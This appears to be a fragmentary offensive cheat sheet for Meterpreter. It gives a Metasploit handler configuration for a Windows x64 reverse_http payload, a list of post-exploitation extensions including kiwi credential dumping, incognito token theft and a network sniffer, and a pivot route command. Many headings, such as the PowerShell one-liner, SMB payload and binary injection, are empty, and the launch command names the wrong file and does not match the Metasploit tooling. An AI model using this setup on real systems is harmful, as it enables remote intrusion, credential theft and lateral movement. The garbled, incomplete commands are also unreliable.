Meterpreter

Start

create launch file, file.rb:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST $ip
set LPORT 443
set exitfunc thread
set EnableStageEncoding True
set ExitOnSession false
exploit -j

launch msf:

meterpreter -r script.rb

Catch:

get session and load all:

load bofloader 
load espia 
load extapi
load incognito 
load kiwi
load lanattacks
load peinjector
load powershell
load priv
load python
load sniffer 
load stdapi
load unhook
load winpmem 

Proxy:

Inject Binary into memory:

Pivot:

first create the named pipe pivot:

Create and send a payload to the handler

create smb payload

execute

meterpreter

msfconsole

XXX/shell_reverse_tcp – Not Stages

XXX/shell/reverse_tcp - Staged

Multi/handler

switch transports:

Pivot :

route add 192.168.1.0/24 11

msfdb

msfvenom

Powershell One-Liner:

Imbed Exe:

Last updated